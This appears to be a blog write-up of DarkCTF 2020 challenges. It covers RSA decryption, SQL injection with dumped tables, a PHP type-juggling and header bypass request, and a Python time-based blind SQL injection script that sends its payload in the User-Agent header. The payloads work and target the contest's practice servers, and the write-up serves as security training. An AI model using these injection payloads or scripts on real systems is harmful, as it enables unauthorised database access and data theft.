DarkCTF 2020 Write-Up

Misc

1. Sanity Check.

Cryptography

1. Pipe Rhyme

Chall:- Pipe RhymeChall Desc:- Wow you are so special.N=0x3b7c97ceb5f01f8d2095578d561cad0f22bf0e9c94eb35a9c41028247a201a6db95f
e=0x10001
ct=0x1B5358AD42B79E0471A9A8C84F5F8B947BA9CB996FA37B044F81E400F883A309B886
N=1763350599372172240188600248087473321738860115540927328389207609428163138985769311
e=65537
ct=810005773870709891389047844710609951449521418582816465831855191640857602960242822
p=31415926535897932384626433832795028841
q=56129192858827520816193436882886842322337671
phi = (p-1)*(q-1)
phi = (31415926535897932384626433832795028841-1)*(5612919285882752081619343688288684232233767101)
phi = 1763350599372172240188600248087473321682730891266173271675081787918842463868402800
from Crypto.Util.number import inverse
d=inverse(e, phi)
m=pow(ct,d,N)
hex(m)
results:0x6461726b4354467b34763069445f7573316e67675f70315f7072316d65737d

Forensics

1. AW

Reversing

1. so_much

Linux

1. linux starter

2. Find-Me

su -l wolf2

Web

1. Apache Logs

2. Simple_SQL

http://simplesql.darkarmy.xyz/
http://simplesql.darkarmy.xyz/index.php?id=*
for x in {0..100};do curl "simplesql.darkarmy.xyz/index.php?id=$x" | grep Username;done

3. So_Simple

http://web.darkarmy.xyz:30001/index.php?id=1'
You have an error in your SQL syntax; check the  manual that corresponds to your MySQL server version for the right  syntax to use near ''1'' LIMIT 0,1' at line 1
available databases [5]:                                                                                                                                                                                                                  
[*] id14831952_security
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
Database: id14831952_security                                                                                                                                                                                                             
Table: users
[9 entries]
+----------+-----------------------------------+---------------+
| id | password | username |
+----------+-----------------------------------+---------------+
| 1 | Try | LOL |
| 2 | another | Try |
| 3 | p@ssword | fake |
| 4 | dont try to hack | its secure |
| 5 | easy | not |
| 6 | my database | dont read |
| 7 | new | try to think |
| 8 | darkCTF{this_is_not_a_flag} | admin |
| 56465219 | darkCTF{uniqu3_ide4_t0_find_fl4g} | flag |
+----------+-----------------------------------+---------------+

4. PHP Information

<!DOCTYPE html> 
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Corona Web</title>
</head>
<body>


<style>
body{
background-color: whitesmoke
}
</style>
<?php

include "flag.php";

echo show_source("index.php");


if (!empty($_SERVER['QUERY_STRING'])) {
$query = $_SERVER['QUERY_STRING'];
$res = parse_str($query);
if (!empty($res['darkctf'])){
$darkctf = $res['darkctf'];
}
}

if ($darkctf === "2020"){
echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}


if (!empty($_SERVER['QUERY_STRING'])) {
$query = $_SERVER['QUERY_STRING'];
$res = parse_str($query);
if (!empty($res['ctf2020'])){
$ctf2020 = $res['ctf2020'];
}
if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";

}
}



if (isset($_GET['karma']) and isset($_GET['2020'])) {
if ($_GET['karma'] != $_GET['2020'])
if (md5($_GET['karma']) == md5($_GET['2020']))
echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
else
echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
}



?>
</body>
</html> 1
GET /index.php?darkctf=2020&ctf2020=WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09&karma[]=[]&2020[]=0e54321 HTTP/1.1
Host: php.darkarmy.xyz:7001
User-Agent: 2020_the_best_year_corona
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=d0bc2a2c6f64d7e52d18c3476fc9b82791600053627
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

5. Agent-U

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '172.69.69.218', 'admin')' at line 1
time pojok kanan bawa
#!/usr/bin/env python3import requests
import time
import json
http_proxy = "http://127.0.0.1:8080"proxyDict = {
"http" : http_proxy,
}
alpha = [chr(x) for x in range(0x61,0x7b)]
for x in range(0,10):
alpha.append(str(x))
alpha.append("_")
req = requests.Session()
data = {"uname":"admin","passwd":"admin","submit":"Submit"}
for x in range(1,35):
for c in alpha:
st=time.time()
headers = {"User-Agent":f"tes',IF(MID(DATABASE(),{x},1) = '{c}', SLEEP(3), 0),'inersin')-- -"}
req.post("http://agent.darkarmy.xyz/",data=data,timeout=10, headers=headers)
if int(time.time()-st) >= 3:
print(c)
break

--

--

PARSECT // IT Security Enthusiast // STOICISM // KEEP DO SOMETHING LEGAL

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
InersIn

InersIn

PARSECT // IT Security Enthusiast // STOICISM // KEEP DO SOMETHING LEGAL